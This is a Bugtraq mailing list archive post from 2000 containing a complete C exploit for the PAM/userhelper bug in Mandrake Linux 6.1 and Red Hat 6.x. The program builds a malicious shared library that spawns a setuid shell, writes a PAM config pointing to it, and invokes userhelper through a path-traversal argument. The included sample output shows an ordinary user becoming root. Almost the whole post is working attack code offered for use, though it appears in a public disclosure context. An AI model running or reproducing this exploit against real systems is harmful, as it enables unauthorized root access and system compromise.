Bugtraq mailing list archives
Exploit for Mandrake 6.1 (PAM/userhelper bug)
From: prrar () NITNET COM BR (Paulo Ribeiro)
Date: Wed, 15 Mar 2000 00:14:05 +0000
/* * pam-mdk.c (C) 2000 Paulo Ribeiro * * DESCRIPTION: * ----------- * Mandrake Linux 6.1 has the same problem as Red Hat Linux 6.x but its * exploit (pamslam.sh) doesn't work on it (at least on my machine). So, * I created this C program based on it which exploits PAM/userhelper * and gives you UID 0. * * SYSTEMS TESTED: * -------------- * Red Hat Linux 6.0, Red Hat Linux 6.1, Mandrake Linux 6.1. * * RESULTS: * ------- * [prrar@linux prrar]$ id * uid=501(prrar) gid=501(prrar) groups=501(prrar) * [prrar@linux prrar]$ gcc pam-mdk.c -o pam-mdk * [prrar@linux prrar]$ ./pam-mdk * sh-2.03# id * uid=0(root) gid=501(prrar) groups=501(prrar) * sh-2.03# */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> int main(int argc, char *argv[]) { FILE *fp; strcpy(argv[0], "vi test.txt"); fp = fopen("abc.c", "a"); fprintf(fp, "#include<stdlib.h>\n"); fprintf(fp, "#include<unistd.h>\n"); fprintf(fp, "#include<sys/types.h>\n"); fprintf(fp, "void _init(void) {\n"); fprintf(fp, "\tsetuid(geteuid());\n"); fprintf(fp, "\tsystem(\"/bin/sh\");\n"); fprintf(fp, "}"); fclose(fp); system("echo -e auth\trequired\t$PWD/abc.so > abc.conf"); system("chmod 755 abc.conf"); system("gcc -fPIC -o abc.o -c abc.c"); system("ld -shared -o abc.so abc.o"); system("chmod 755 abc.so"); system("/usr/sbin/userhelper -w ../../..$PWD/abc.conf"); system("rm -rf abc.*"); } /* pam-mdk.c: EOF */ ___________________________________ Paulo Ribeiro prrar () nitnet com br
Current thread:
- TESO advisory -- wmcdplay krahmer () CS UNI-POTSDAM DE (Mar 11)
- Our old friend Firewall-1 Chris Brenton (Mar 11)
- Re: Our old friend Firewall-1 Hugo.van.der.Kooij () CAIW NL (Mar 14)
- Re: Our old friend Firewall-1 Chris Brenton (Mar 15)
- TESO & C-Skills development advisory -- imwheel Sebastian (Mar 16)
- Re: TESO & C-Skills development advisory -- imwheel WHiTe VaMPiRe (Mar 19)
- Re: Our old friend Firewall-1 Hugo.van.der.Kooij () CAIW NL (Mar 14)
- Re: TESO advisory -- wmcdplay Kris Kennaway (Mar 11)
- CSS Exploits + RDS (IE5) Shane Hird (Mar 12)
- Advisory Update: ServerIron TCP/IP predictability fixed Andrew van der Stock (Mar 12)
- Exploit for Mandrake 6.1 (PAM/userhelper bug) Paulo Ribeiro (Mar 14)
- Re: Exploit for Mandrake 6.1 (PAM/userhelper bug) Darron Froese (Mar 17)
- Re: Exploit for Mandrake 6.1 (PAM/userhelper bug) Matt Davis (Mar 17)
- Re: Exploit for Mandrake 6.1 (PAM/userhelper bug) Jeremy Gault (Mar 21)
- Oracle Web Listener 4.0.x Cerberus Security Team (Mar 14)
- Re: Advisory Update: ServerIron TCP/IP predictability fixed H D Moore (Mar 14)
- Re: Advisory Update: ServerIron TCP/IP predictability fixed Max Vision (Mar 16)
- FreeBSD Security Advisory: FreeBSD-SA-00:07.mh [REVISED] FreeBSD Security Officer (Mar 19)
- Bypassing IP filters in Bordermanager 3.5 Roy Sigurd Karlsbakk (Mar 15)
- Local / Remote DoS Attack in MERCUR WebView WebMail-Client 1.0 for Windows 98/NT Vulnerability Ussr Labs (Mar 15)
- Certificate Validation Error in Netscape Browsers... Dennis W. Mattison (Little Wolf) (Mar 15)
- Exploit for Mandrake 6.1 (PAM/userhelper bug) Paulo Ribeiro (Mar 14)
(Thread continues...)
- Our old friend Firewall-1 Chris Brenton (Mar 11)